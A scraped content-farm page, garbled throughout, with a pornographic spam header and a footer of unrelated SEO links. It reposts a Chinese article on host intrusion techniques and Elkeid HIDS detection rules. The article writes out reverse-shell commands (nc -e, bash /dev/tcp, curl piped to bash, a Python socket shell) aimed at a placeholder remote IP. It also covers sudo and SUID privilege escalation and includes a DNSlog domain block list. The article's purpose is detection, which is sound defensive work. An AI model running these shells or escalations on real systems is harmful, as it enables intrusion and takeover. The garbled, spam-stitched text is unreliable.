中文亚洲精品无码_熟女乱子伦免费_人人超碰人人爱国产_亚洲熟妇女综合网

當(dāng)前位置: 首頁 > news >正文

wordpress仿站網(wǎng)/茶葉推廣軟文

wordpress仿站網(wǎng),茶葉推廣軟文,優(yōu)秀專題網(wǎng)站,十堰網(wǎng)站開發(fā)目錄 概述反彈shell原理nc/dev/xxx反彈shell下載不落地反彈Shell各種語言反彈shell linux提權(quán)sudosuid提權(quán)mysql提權(quán) Dnslog參考 概述 本文更新通過在主機(jī)(不含容器)上直接執(zhí)行命令或啟動(dòng)進(jìn)程來攻擊的場(chǎng)景。檢測(cè)方面以字節(jié)跳動(dòng)的開源HIDS elkeid舉例。每…

目錄

  • 概述
  • 反彈shell
    • 原理
    • nc
    • /dev/xxx反彈shell
    • 下載不落地反彈Shell
    • 各種語言反彈shell
  • linux提權(quán)
    • sudo
    • suid提權(quán)
    • mysql提權(quán)
  • Dnslog
  • 參考


概述

本文更新通過在主機(jī)(不含容器)上直接執(zhí)行命令或啟動(dòng)進(jìn)程來攻擊的場(chǎng)景。檢測(cè)方面以字節(jié)跳動(dòng)的開源HIDS elkeid舉例。每種檢測(cè)僅舉一個(gè)例子,其余的給出示例payload。

反彈shell

原理

控制端監(jiān)聽在某TCP/UDP端口,被控端發(fā)起請(qǐng)求到該端口,并將其命令行的輸入輸出轉(zhuǎn)到控制端

nc

nc 遠(yuǎn)程ip 端口 -e /bin/bash

Elkeid規(guī)則如下:

(?:\bnc(?:\s+-+\w+\s*[^\x3B\x7C]*\s+-\w*e\w*\b|\s+-\w*e\w*|\s+[\d\.\s]+\s+-\w*e\w*)|\bnc.openbsd(?:\s+-+\w+\s*[^\x3B\x7C]*\s+-\w*e\w*\b|\s+-\w*e\w*|\s+[\d\.\s]+\s+-\w*e\w*)|\bnc.traditional(?:\s+-+\w+\s*[^\x3B\x7C]*\s+-\w*e\w*\b|\s+-\w*e\w*|\s+[\d\.\s]+\s+-\w*e\w*)|\bnc.linux(?:\s+-+\w+\s*[^\x3B\x7C]*\s+-\w*e\w*\b|\s+-\w*e\w*|\s+[\d\.\s]+\s+-\w*e\w*)|\bnetcat(?:\s+-+\w+\s*[^\x3B\x7C]*\s+-\w*e\w*\b|\s+-\w*e\w*|\s+[\d\.\s]+\s+-\w*e\w*))

在這里插入圖片描述

/dev/xxx反彈shell

指的是通過/dev/tcp或/dev/udp的方式建立連接反彈shell,舉例:

bash -i >& /dev/tcp/遠(yuǎn)程ip/端口 0>&1

下載不落地反彈Shell

指的是下載后通過管道等方式執(zhí)行,不落地,舉例:

curl/wget http://xxx.sh | bash

各種語言反彈shell

以Python為例:

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("遠(yuǎn)程ip",端口));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'

linux提權(quán)

sudo

原理:臨時(shí)賦予root權(quán)限運(yùn)行某個(gè)程序

sudo less file_path
!bash

在這里插入圖片描述

在這里插入圖片描述
在這里插入圖片描述

suid提權(quán)

chmod u+s filename 設(shè)置SUID位
chmod u-s filename 去掉SUID設(shè)置

收集具有suid的文件

find / -perm -u=s -type f 2>/dev/null
find / -user root -perm -4000 -print 2>/dev/null
find / -user root -perm -4000 -exec ls -ldb {} ;

在這里插入圖片描述

mysql提權(quán)

  • udf提權(quán)
  • 寫入webshell提權(quán)
  • mof提權(quán)

Dnslog

Elkeid規(guī)則如下:

.awvsscan119.autoverify.cn|.cybertunnel.run|.dnstunnel.run|.s0x.cn|.dns.1433.eu.org|.logplog.eu.org|.ns.dns3.cf|.vuleye.pw|.ceye.io|.exeye.io|.vcap.me|.xip.name|.xip.io|.sslip.io|.nip.io|.burpcollaborator.net|.tu4.org|.2xss.cc|.bxss.me|.godns.vip|.0kee.#|.r87.me|.ngrok.io|.xn--9tr.com|.pipedream.net|.vxtrans.com|.vxtrans.link|.hopto.org|.zapto.org|.sytes.net|.ddns.net

在這里插入圖片描述
在這里插入圖片描述

參考

linux提權(quán)
反彈Shell原理及檢測(cè)技術(shù)研究

http://www.risenshineclean.com/news/118.html

相關(guān)文章:

  • dede靜態(tài)網(wǎng)站模板下載/廣告推廣策劃
  • 網(wǎng)站前面的logo標(biāo)志/網(wǎng)絡(luò)營銷品牌推廣公司
  • 滁州做網(wǎng)站電話號(hào)碼/seo推廣服務(wù)哪家好
  • 石家莊網(wǎng)絡(luò)公司排名/南昌seo公司
  • 免費(fèi)的行情軟件網(wǎng)站在線使用/企業(yè)網(wǎng)站建設(shè)多少錢
  • 山東省建設(shè)工程注冊(cè)中心網(wǎng)站/114黃頁
  • 手機(jī)網(wǎng)站后臺(tái)/seo是什么?
  • 做黨和人民滿意的好教師PPT網(wǎng)站/百度瀏覽器廣告怎么投放
  • 中國百強(qiáng)城市榜單排名/seo sem推廣
  • 南寧機(jī)關(guān)兩學(xué)一做網(wǎng)站/網(wǎng)絡(luò)營銷八大工具
  • 天津市建設(shè)工程信息交易網(wǎng)/seo免費(fèi)培訓(xùn)教程
  • 做餐飲要看的網(wǎng)站/seo批量建站
  • 北京做網(wǎng)站浩森宇特/品牌推廣軟文200字
  • 靖江網(wǎng)站建設(shè)/百度小說風(fēng)云榜今天
  • 漳州專業(yè)網(wǎng)站建設(shè)費(fèi)用/青島seo用戶體驗(yàn)
  • 天津做網(wǎng)站要多少錢/百度seo流量
  • 專業(yè)建設(shè)網(wǎng)站公司哪家好/優(yōu)化深圳seo
  • 企業(yè)網(wǎng)站服務(wù)器選擇/torrentkitty磁力官網(wǎng)
  • 石獅市網(wǎng)站建設(shè)/seo 頁面鏈接優(yōu)化
  • 上海網(wǎng)站排名團(tuán)隊(duì)/百度搜索引擎的網(wǎng)址是
  • ds216j做網(wǎng)站/跨境電商培訓(xùn)
  • 微網(wǎng)站 pc網(wǎng)站同步/長沙靠譜關(guān)鍵詞優(yōu)化公司電話
  • 人設(shè)生成器網(wǎng)站/怎么把平臺(tái)推廣出去
  • 溧陽手機(jī)網(wǎng)站哪里做/學(xué)it什么培訓(xùn)機(jī)構(gòu)好
  • 找人網(wǎng)站/網(wǎng)頁模板怎么用
  • 揭陽網(wǎng)站制作案例/如何在各種網(wǎng)站投放廣告
  • 網(wǎng)站免費(fèi)正能量入口/百度首頁推薦關(guān)不掉嗎
  • 網(wǎng)站建設(shè)步驟及分工/優(yōu)秀軟文范例100字
  • 對(duì)網(wǎng)站進(jìn)行優(yōu)化/網(wǎng)站排名快速提升
  • 武城網(wǎng)站建設(shè)費(fèi)用/品牌營銷公司